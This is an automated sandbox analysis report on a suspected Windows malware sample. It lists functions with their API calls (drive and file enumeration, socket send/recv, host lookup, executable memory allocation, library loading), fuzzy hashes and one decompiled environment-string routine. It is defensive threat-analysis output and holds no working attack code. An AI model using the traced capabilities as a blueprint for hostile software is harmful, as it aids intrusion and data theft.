Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: ConnectedInternetSleepState
String ID:
API String ID: 1839875000-0
Opcode ID: 14bcb86233d9ebed3bbdfc558e8c10521000c34fa656b9b04b6c49f0f5f1a51e
Instruction ID: efee4a31d84cfcd3eda61e8f215f3e95b79e02d1904b36110b2126a4541bb3b4
Opcode Fuzzy Hash: 14bcb86233d9ebed3bbdfc558e8c10521000c34fa656b9b04b6c49f0f5f1a51e
Instruction Fuzzy Hash: D601D2714083419BDB21CBA58E49F6BB7E8AF84750F11086EE090672D1D7F4E808876A

Uniqueness

Uniqueness Score: -1.00%

Function 004030C4 Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

_hread.KERNEL32(00000000,00000048,00000001), ref: 004030E6
_hwrite.KERNEL32(00000000,?,00000001), ref: 00403127
_hwrite.KERNEL32(00000000,00409F54,00000002), ref: 0040315B

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: _hwrite$_hread
String ID:
API String ID: 3431307824-0
Opcode ID: 5c27c36f32c45f54858f50d38febd5da18f17d723ace1d0f2e7a146b210c609c
Instruction ID: ec74a96faae2de6342ed72b230e361a1cf541ba27cf05cf86b168187b5a235bf
Opcode Fuzzy Hash: 5c27c36f32c45f54858f50d38febd5da18f17d723ace1d0f2e7a146b210c609c
Instruction Fuzzy Hash: 1A21A472D00208AADF219FA5DC41AEEBBBCFB44726F204237E625B51D0D3759B42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401A6D Relevance: 4.6, APIs: 3, Instructions: 55fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,766DF7B0), ref: 00401A81
ReadFile.KERNELBASE(00000000,?,00000400,0000001E,00000000), ref: 00401AA8
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00401AE6

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: File$Pointer$Read
String ID:
API String ID: 2010065189-0
Opcode ID: c1cb5ac4bd7c476b9025d8c02543f4d02b95a7f61c2fe20247fdc7a01dd72326
Instruction ID: 22d6aeff70773fb75671422772fae53a33c20c81b927d55a61e164b9e27d47d2
Opcode Fuzzy Hash: c1cb5ac4bd7c476b9025d8c02543f4d02b95a7f61c2fe20247fdc7a01dd72326
Instruction Fuzzy Hash: ED1103B5901028BBDB219F91CD48CDFBF7CEF453A4F1040A6BA08A2120D6309A46DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 0040221E Relevance: 4.5, APIs: 3, Instructions: 32threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00402231
SetThreadPriority.KERNELBASE(00000000), ref: 00402238
GetDriveTypeA.KERNELBASE(?), ref: 00402245

Part of subcall function 00402100: FindFirstFileA.KERNELBASE(?,?,?,?,?,00000018), ref: 0040213B
Part of subcall function 00402100: CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,?,?,?,00000018), ref: 004021CF
Part of subcall function 00402100: FindNextFileA.KERNELBASE(00000000,00000010,?,?,?,?,?,?,?,?,?,?,00000018), ref: 00402206
Part of subcall function 00402100: FindClose.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,00000018), ref: 00402215

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: Find$FileThread$BuffCharCloseCurrentDriveFirstLowerNextPriorityType
String ID:
API String ID: 1999482922-0
Opcode ID: 872127d2f0170abb83b19be3605090997fb0698e6a7083e9a61b295ea67dc217
Instruction ID: b380582c7f5cef2f241d2c7f4e314930190b042be116c0d4091ea3fe49160b37
Opcode Fuzzy Hash: 872127d2f0170abb83b19be3605090997fb0698e6a7083e9a61b295ea67dc217
Instruction Fuzzy Hash: 2CE0E573804118ABCB00F7E89E4C8CF7B6CDB463207100672F601F60D0C6B4AB40C768

Uniqueness

Uniqueness Score: -1.00%

Function 00402BBB Relevance: 3.1, APIs: 2, Instructions: 77networkCOMMON

Download Yara Rule

APIs

send.WS2_32(0000FFFF,00000000,00000000,00000000), ref: 00402BE1
recv.WS2_32(0000FFFF,?,00000001,00000000), ref: 00402C15

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: recvsend
String ID:
API String ID: 740075404-0
Opcode ID: 650197d8e109205bce47370e649259a66e5218fc7b4e70fc84c49d3c9a8d3b1a
Instruction ID: f4034ed6f6bee5bd1b191479a54a9347b8f757163cb2ee76721324db6ba34ad1
Opcode Fuzzy Hash: 650197d8e109205bce47370e649259a66e5218fc7b4e70fc84c49d3c9a8d3b1a
Instruction Fuzzy Hash: C92129312080545DFB358E28CACCBEA3BAAEB01358F500177E615FA1E1D7F9998AC74D

Uniqueness

Uniqueness Score: -1.00%

Function 0040253F Relevance: 3.0, APIs: 2, Instructions: 26networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(766C8170), ref: 00402546
gethostbyname.WS2_32(766C8170), ref: 0040255D

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: gethostbynameinet_addr
String ID:
API String ID: 1594361348-0
Opcode ID: b2207a9c821f8abbd65849a0ff95bd4082b6fe32d890b2c87e659865ed58f3b1
Instruction ID: 8fc69cb648a3174317d864340211b828eb4e11aade93797632f37c6a15d18c7d
Opcode Fuzzy Hash: b2207a9c821f8abbd65849a0ff95bd4082b6fe32d890b2c87e659865ed58f3b1
Instruction Fuzzy Hash: 5AE06D36A052206FC621573CAE5C96BB7A89B4A770B060372EC60B73E0D374AC02C69D

Uniqueness

Uniqueness Score: -1.00%

Function 00404977 Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00403EBE,00000000), ref: 00404988

Part of subcall function 00404D2B: RtlAllocateHeap.NTDLL(00000000,00000140,0040499C), ref: 00404D38

HeapDestroy.KERNEL32 ref: 004049A6

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: Heap$AllocateCreateDestroy
String ID:
API String ID: 316229882-0
Opcode ID: 583ed80571bf3123517203767dd53b5c427584f4ab6b0c06d27ac13b948e7046
Instruction ID: 6746bf645960ef0e34d1f5d1aeda900b7d8c8a6923d3ac2e53582c7d7a1ef0e0
Opcode Fuzzy Hash: 583ed80571bf3123517203767dd53b5c427584f4ab6b0c06d27ac13b948e7046
Instruction Fuzzy Hash: D9E05BF0615301DEEB501B30DD09B6736D4AB94782F048436FA05E51E4EF79D850E607

Uniqueness

Uniqueness Score: -1.00%

Function 005CBBD4 Relevance: 2.6, APIs: 2, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005CBC88
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005CBCE4

Memory Dump Source

Source File: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 41eae4d96395585f9a94f7d926cdf45de3e8d01c70e8ef83a6f2088cfd306625
Instruction ID: 11fb4b6ef3cb239d5961e17c794304987cf52fd4f63da3c6c1cbc876345b8c75
Opcode Fuzzy Hash: 41eae4d96395585f9a94f7d926cdf45de3e8d01c70e8ef83a6f2088cfd306625
Instruction Fuzzy Hash: 6C3117722042049FFB18DEA8CC83F667BA4FFD8329F14456DE945CB25ED725EC018A94

Uniqueness

Uniqueness Score: -1.00%

Function 005CBC55 Relevance: 2.6, APIs: 2, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005CBC88
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005CBCE4

Memory Dump Source

Source File: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: c40b3eece263d8114ce32233b48c3b2925afa46e2afbda71c4ffc96dfb2c1ab0
Instruction ID: 18af7a4a144c924b6b88f9252f7e9bce48e2d3e13c319fc187dabc89431b97c2
Opcode Fuzzy Hash: c40b3eece263d8114ce32233b48c3b2925afa46e2afbda71c4ffc96dfb2c1ab0
Instruction Fuzzy Hash: 11116A72240600AFEB28CF58DC81F67B7E5EF88764F1440A9EA09DB359D670EC11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 005E07A5 Relevance: 1.5, APIs: 1, Instructions: 29libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?), ref: 005E07C6

Memory Dump Source

Source File: 00000000.00000003.298323919.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5e0000_ .jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9ad165436d458145d1bfba04ae4137792d26044e975007e1cc314144093ac068
Instruction ID: e06876fa024d30c5b0623ed22ff27d57ccb49e2817165cec8f11d6ddb564cfa8
Opcode Fuzzy Hash: 9ad165436d458145d1bfba04ae4137792d26044e975007e1cc314144093ac068
Instruction Fuzzy Hash: 99F08236B012458B8F18CE39954019A3B61FF843A07108276EC58DB38CDB30EC518B80

Uniqueness

Uniqueness Score: -1.00%

Function 00403FDC Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0040400A

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 27bfc192e94723c7bd0ec06087c43c38f4b558c86d2fccc31ab9b18a133a6917
Instruction ID: 0f30639a0edd6a23c0c3f34d8bfe81c4f5b6771a7d970d377dc2753e36998c35
Opcode Fuzzy Hash: 27bfc192e94723c7bd0ec06087c43c38f4b558c86d2fccc31ab9b18a133a6917
Instruction Fuzzy Hash: 24E0C232C0A6325AEA216B14BC01BCB3A18AF11720F0A0132FD947B2E0DB742D8095CD

Uniqueness

Uniqueness Score: -1.00%

Function 00404087 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,?,00000000,0040475E,>@,?,00000000,?,?,?,?,00403EE3), ref: 004040AE

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: af3708714d8786ca8d09b4ad4a289a8fc66a496873722cbfc5fe96b2a56c192c
Instruction ID: d1c55158bd3600379ccead1570d0d82a42905fe446ac52d1b24457888ff3f8f6
Opcode Fuzzy Hash: af3708714d8786ca8d09b4ad4a289a8fc66a496873722cbfc5fe96b2a56c192c
Instruction Fuzzy Hash: 4CD05EB290E6306ED5612624FC05FDB23989F82B20B19006BFB00B61D5CA396C4191DD

Uniqueness

Uniqueness Score: -1.00%

Function 00401C09 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,00000000), ref: 00401C19

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: dff2ff84ddc1f1190e195f8e257ef9ab4666feced9b237510428d42a6a0bc19d
Instruction ID: 718e06348f08c90f52b867e156d9dc5eb9082b2823f9d78986d0ec70d59e2f61
Opcode Fuzzy Hash: dff2ff84ddc1f1190e195f8e257ef9ab4666feced9b237510428d42a6a0bc19d
Instruction Fuzzy Hash: 85B01275D041047FF352AB54ED56EF6366CBB4C300FC400747954842C1E2FE552C46A7

Uniqueness

Uniqueness Score: -1.00%

Function 00405479 Relevance: 1.3, APIs: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,?,00000000,000000E0,?,?,0040519F,000000E0,?,?,?,00000100), ref: 004054CA

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4dcd21c49c760c0a40e9c5b5510a0325480072a57621f995bf2fac2e4714889d
Instruction ID: 8f104291fd582a828a108c49519f5504cee00723c53dd5cc6aacb1ee8532dc2e
Opcode Fuzzy Hash: 4dcd21c49c760c0a40e9c5b5510a0325480072a57621f995bf2fac2e4714889d
Instruction Fuzzy Hash: F9316B716016069FD314CF18C884BA6BBE4FF54364F2482BAE55A8B3E2D774E946CB44

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004019E8 Relevance: 1.5, APIs: 1, Instructions: 41timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(0000002E,0000002E,?,00000000,0000001E), ref: 004019F2

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: SystemTime
String ID:
API String ID: 2656138-0
Opcode ID: 7a282ea217ddfd4d38e267aa96cf92d41398b58685d94b215b3c31032841fdf4
Instruction ID: 8b2054713c7dd0f77c20d1ba98ab8fdce38ea409b15a779b453011456b8b31c7
Opcode Fuzzy Hash: 7a282ea217ddfd4d38e267aa96cf92d41398b58685d94b215b3c31032841fdf4
Instruction Fuzzy Hash: FE014820E21218A6CF14EB94C5485EDB3B0FF44348F4099AAE021B73A0E3F99685CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00401691 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96d003935b1ab63d49327bdf2175a018dd6f6e7cb0d12f103f6fb2d12b8ffe6d
Instruction ID: d123a066ea988dd01b90323a63dc7c434c38d23393a956b3d09959637717261e
Opcode Fuzzy Hash: 96d003935b1ab63d49327bdf2175a018dd6f6e7cb0d12f103f6fb2d12b8ffe6d
Instruction Fuzzy Hash: 19318133E285B217C3248EBA5C80066F7D1AB8E22538A87B5DD94FB391E12DFD1186D4

Uniqueness

Uniqueness Score: -1.00%

Function 00405EA5 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,004078B0,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00405EE7
LCMapStringA.KERNEL32(00000000,00000100,005C99A4,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00405F03
LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00405F4C
MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00405F84
MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00405FDC
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00405FF2
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00406025
LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0040608D

Strings

@hhvPIhv0Ihv, xrefs: 004060B2

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID: @hhvPIhv0Ihv
API String ID: 352835431-1837815877
Opcode ID: 03aa6909c5a39891f4941fa23c09f1ac19900eecb2cdd141329dc4052ed81fe0
Instruction ID: 463dd7c9f7ffaba65291e412c147e076a142b329239bc3a47c32de52c4372b74
Opcode Fuzzy Hash: 03aa6909c5a39891f4941fa23c09f1ac19900eecb2cdd141329dc4052ed81fe0
Instruction Fuzzy Hash: 4D518C71940249AFCF228F95DC45AEF7FB9FB48754F10412AF901B12A0C3399D20EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040469A Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040469A() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x5c9b08; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E00403F9E(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00403670(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E00403F9E(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										_t4 =  &_v8; // 0x403ee3
										E00404087( *_t4);
										_v8 = _t32;
									}
									_t6 =  &_v8; // 0x403ee3
									_t32 =  *_t6;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x5c9b08 = 2;
					goto L18;
				}
				 *0x5c9b08 = 1;
				goto L6;
			}

0x0040469c
0x004046ab
0x004046ad
0x004046af
0x004046b3
0x004046eb
0x00404775
0x004047c3
0x00000000
0x004047c3
0x00404777
0x00404779
0x00404787
0x00404789
0x0040478b
0x00404797
0x0040479a
0x004047a2
0x004047a7
0x004047b0
0x004047a9
0x004047a9
0x004047a9
0x004047b9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040478d
0x0040478d
0x0040478d
0x0040478d
0x0040478e
0x00404792
0x00404793
0x00000000
0x0040478d
0x00404781
0x00404785
0x00000000
0x00000000
0x00000000
0x00404785
0x004046f1
0x004046f3
0x00404701
0x00404704
0x00404706
0x00404716
0x00404722
0x00404729
0x0040472f
0x00404733
0x00404736
0x0040473e
0x00404742
0x00404753
0x00404755
0x00404759
0x0040475f
0x0040475f
0x00404763
0x00404763
0x00404763
0x00404742
0x00404768
0x00000000
0x00000000
0x00000000
0x00000000
0x00404708
0x00404708
0x00404708
0x00404709
0x0040470a
0x00404710
0x00404711
0x00000000
0x00404708
0x004046f7
0x004046fb
0x00000000
0x00000000
0x00000000
0x004046fb
0x004046b7
0x004046bb
0x004046cf
0x004046d3
0x00000000
0x00000000
0x004046d9
0x00000000
0x004046d9
0x004046bd
0x00000000

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403EE3), ref: 004046B5
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403EE3), ref: 004046C9
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403EE3), ref: 004046F5
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403EE3), ref: 0040472D
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403EE3), ref: 0040474F
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00403EE3), ref: 00404768
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403EE3), ref: 0040477B
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004047B9

Strings

@hhvPIhv0Ihv, xrefs: 00404718
>@, xrefs: 00404763, 00404755

Memory Dump Source

